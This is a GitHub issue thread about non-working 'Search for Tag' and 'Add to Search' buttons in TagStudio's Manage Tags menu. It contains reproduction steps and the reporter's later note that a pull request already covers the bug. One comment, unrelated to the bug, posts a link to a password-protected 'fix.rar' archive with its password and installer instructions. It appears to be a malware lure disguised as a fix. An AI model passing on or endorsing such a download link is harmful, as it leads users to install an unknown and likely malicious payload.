### ISSUE TITLE
[Bug]: Buttons "Search for Tag" and "Add to Search" not working in Manage Tags menu

### ISSUE THREAD

**Issue by TheTimebreaker** [TagStudioDev/TagStudio#401]
### Checklist

- [X] I am using an up-to-date version.
- [X] I have read the [documentation](https://github.com/TagStudioDev/TagStudio/blob/main/doc/index.md).
- [X] I have searched existing [issues](https://github.com/TagStudioDev/TagStudio/issues).

### TagStudio Version

Alpha 9.3.2

### Operating System & Version

Windows 11 Pro 23H2 (version 10.0.22631 build 22631)

### Description

The buttons "Search for Tag" and "Add to Search" don't work when clicked from the "Manage Tags" menu.
(you get them by right clicking a tag). If clicked, nothing happens. The search bar does not change and no search is triggered.

Interestingly, these buttons work partially when clicked in the main window (e.g. when you click on an image and then right click a tag associated with that image and select one of these buttons)
Left clicking the tag and using "Search for Tag" both (apparently) do the same thing and search for "tag_id: {tagid}", while the "Add to Search" button does nothing again.

I know a thing or two about python, so I will try to hunt this down. Although I've only ever botched together some janky stuff for myself and never did anything for a larger project like this, so no promises.

### Expected Behavior

I would expect the buttons that say "do X" to do X.

### Steps to Reproduce

issue from manage tags:
1. Click "Edit" > "Manage Tags".
2. Right click any tag. 
3. Select either "Search for Tag" or "Add to Search".
4. Observe, as nothing happens.

buttons in main window not working:
1. Click on any image with tags.
2. Right click any tag.
3. Select "Add to Search"
4. Observe, as nothing happens.

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by TheTimebreaker** [comment]
whoopsie, just saw that theres already a pull request for this: [https://github.com/TagStudioDev/TagStudio/pull/398#issue-2485536656](https://github.com/TagStudioDev/TagStudio/pull/398#issue-2485536656)
100 % my bad for not checking, sorry
